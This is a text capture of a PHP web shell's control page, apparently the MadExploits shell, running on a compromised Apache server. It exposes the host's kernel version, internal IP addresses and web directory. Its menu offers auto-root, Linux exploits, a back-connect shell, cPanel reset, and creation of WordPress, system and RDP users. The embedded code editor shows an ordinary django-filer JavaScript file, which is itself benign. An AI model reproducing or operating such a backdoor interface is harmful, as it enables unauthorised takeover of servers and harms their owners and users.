Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
vicas-dev /
static /
filer /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
base.js
10.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : base.js
// ##################################################################################################################### // #BASE# // Basic logic django filer 'use strict'; var Cl = window.Cl || {}; /* globals Mediator, django */ // as of Django 2.x we need to check where jQuery is var djQuery = window.$; if (django.jQuery) { djQuery = django.jQuery; } // mediator init Cl.mediator = new Mediator(); (function ($) { $(function () { var showErrorTimeout; window.filerShowError = function (message) { var messages = $('.messagelist'); var header = $('#header'); var filerErrorClass = 'js-filer-error'; var tpl = '<ul class="messagelist"><li class="error ' + filerErrorClass + '">{msg}</li></ul>'; var msg = tpl.replace('{msg}', message); messages.length ? messages.replaceWith(msg) : header.after(msg); if (showErrorTimeout) { clearTimeout(showErrorTimeout); } showErrorTimeout = setTimeout(function () { $('.' + filerErrorClass).remove(); }, 5000); }; // Focal point logic init if (Cl.FocalPoint) { new Cl.FocalPoint(); } // Toggler init if (Cl.Toggler) { new Cl.Toggler(); } $('.js-filter-files').on('focus blur', function (event) { var container = $(this).closest('.navigator-top-nav'); var dropdownTrigger = container.find('.dropdown-container a'); if (event.type === 'focus') { container.addClass('search-is-focused'); } else { if (!dropdownTrigger.is(event.relatedTarget)) { container.removeClass('search-is-focused'); } } }); // Focus on the search field on page load (function () { var filter = $('.js-filter-files'); var containerSelector = '.navigator-top-nav'; var searchDropdown = $(containerSelector).find('.filter-search-wrapper').find('.filer-dropdown-container'); if (filter.length) { filter.on('keydown', function () { $(this).closest(containerSelector).addClass('search-is-focused'); }); searchDropdown.on('show.bs.filer-dropdown', function () { $(containerSelector).addClass('search-is-focused'); }).on('hide.bs.filer-dropdown', function () { $(containerSelector).removeClass('search-is-focused'); }); } }()); // show counter if file is selected (function () { var navigatorTable = $('.navigator-table tr, .navigator-list .list-item'); var actionList = $('.actions-wrapper'); var actionSelect = $( '.action-select, #action-toggle, #files-action-toggle, #folders-action-toggle, .actions .clear a' ); // timeout is needed to wait until table row has class selected. setTimeout(function () { // Set classes for checked items actionSelect.each(function (no, el) { if (el.checked) { el.closest('.list-item').classList.add('selected'); } }); if (navigatorTable.hasClass('selected')) { actionList.addClass('action-selected'); } }, 100); actionSelect.on('change', function () { // Mark element selected (for table view this is done by Django admin js - we do it ourselves if ($(this).prop('checked')) { $(this).closest('.list-item').addClass('selected'); } else { $(this).closest('.list-item').removeClass('selected'); } // setTimeout makes sure that change event fires before click event which is reliable to admin setTimeout(function () { if (navigatorTable.hasClass('selected')) { actionList.addClass('action-selected'); } else { actionList.removeClass('action-selected'); } }, 0); }); }()); (function () { var actionsMenu = $('.js-actions-menu'); var dropdown = actionsMenu.find('.filer-dropdown-menu'); var actionsSelect = $('.actions select[name="action"]'); var actionsSelectOptions = actionsSelect.find('option'); var actionsGo = $('.actions button[type="submit"]'); var html = ''; var actionDelete = $('.js-action-delete'); var actionCopy = $('.js-action-copy'); var actionMove = $('.js-action-move'); var valueDelete = 'delete_files_or_folders'; var valueCopy = 'copy_files_and_folders'; var valueMove = 'move_files_and_folders'; var navigatorTable = $('.navigator-table tr, .navigator-list .list-item'); // triggers delete copy and move actions on separate buttons function actionsButton(optionValue, actionButton) { actionsSelectOptions.each(function () { if (this.value === optionValue) { actionButton.show(); actionButton.on('click', function (e) { e.preventDefault(); if (navigatorTable.hasClass('selected')) { actionsSelect.val(optionValue).prop('selected', true); actionsGo.trigger('click'); } }); } }); } actionsButton(valueDelete, actionDelete); actionsButton(valueCopy, actionCopy); actionsButton(valueMove, actionMove); // mocking the action buttons to work in frontend UI actionsSelectOptions.each(function (index) { var className = ''; if (index !== 0) { if (this.value === valueDelete || this.value === valueCopy || this.value === valueMove) { className = 'class="hidden"'; } html += '<li><a href="#"' + className + '>' + $(this).text() + '</a></li>'; } }); dropdown.append(html); dropdown.on('click', 'a', function (clickEvent) { var targetIndex = $(this).closest('li').index() + 1; clickEvent.preventDefault(); actionsSelect.find('option').eq(targetIndex).prop('selected', true); actionsGo.trigger('click'); }); actionsMenu.on('click', function (e) { if (!navigatorTable.hasClass('selected')) { e.preventDefault(); e.stopPropagation(); } }); }()); // breaks header if breadcrumbs name reaches a width of 80px (function () { var minBreadcrumbWidth = 80; var header = $('.navigator-top-nav'); var breadcrumbContainer = $('.breadcrumbs-container'); var breadcrumbFolderWidth = breadcrumbContainer.find('.navigator-breadcrumbs').outerWidth(); var breadcrumbDropdownWidth = breadcrumbContainer.find('.filer-dropdown-container').outerWidth(); var searchWidth = $('.filter-files-container').outerWidth(); var actionsWidth = $('.actions-wrapper').outerWidth(); var buttonsWidth = $('.navigator-button-wrapper').outerWidth(); var headerPadding = parseInt(header.css('padding-left'), 10) + parseInt(header.css('padding-right'), 10); var headerWidth = header.outerWidth(); var fullHeaderWidth = minBreadcrumbWidth + breadcrumbFolderWidth + breadcrumbDropdownWidth + searchWidth + actionsWidth + buttonsWidth + headerPadding; var breadcrumbSizeHandlerClassName = 'breadcrumb-min-width'; var breadcrumbSizeHandler = function () { if (headerWidth < fullHeaderWidth) { header.addClass(breadcrumbSizeHandlerClassName); } else { header.removeClass(breadcrumbSizeHandlerClassName); } }; breadcrumbSizeHandler(); $(window).on('resize', function () { headerWidth = header.outerWidth(); breadcrumbSizeHandler(); }); }()); // thumbnail folder admin view (function () { var $actionEls = $('.navigator-list .list-item input.action-select'), foldersActionCheckboxes = '.navigator-list .navigator-folders-body .list-item input.action-select', filesActionCheckboxes = '.navigator-list .navigator-files-body .list-item input.action-select', $allFilesToggle = $('#files-action-toggle'), $allFoldersToggle = $('#folders-action-toggle'); $allFoldersToggle.on('click', function () { if (!!$(this).prop('checked')) { $(foldersActionCheckboxes).filter(':not(:checked)').trigger('click'); } else { $(foldersActionCheckboxes).filter(':checked').trigger('click'); } }); $allFilesToggle.on('click', function () { if (!!$(this).prop('checked')) { $(filesActionCheckboxes).filter(':not(:checked)').trigger('click'); } else { $(filesActionCheckboxes).filter(':checked').trigger('click'); } }); $actionEls.on('click', function () { if (!$(this).prop('checked')) { if (!!$(filesActionCheckboxes).filter(':not(:checked)').length) { $allFilesToggle.prop('checked', false); } if (!!$(foldersActionCheckboxes).filter(':not(:checked)').length) { $allFoldersToggle.prop('checked', false); } } else { if (!$(filesActionCheckboxes).filter(':not(:checked)').length) { $allFilesToggle.prop('checked', true); } if (!$(foldersActionCheckboxes).filter(':not(:checked)').length) { $allFoldersToggle.prop('checked', true); } } }); $('.navigator .actions .clear a').on('click', function () { $allFoldersToggle.prop('checked', false); $allFilesToggle.prop('checked', false); }); })(); }); })(djQuery);
Close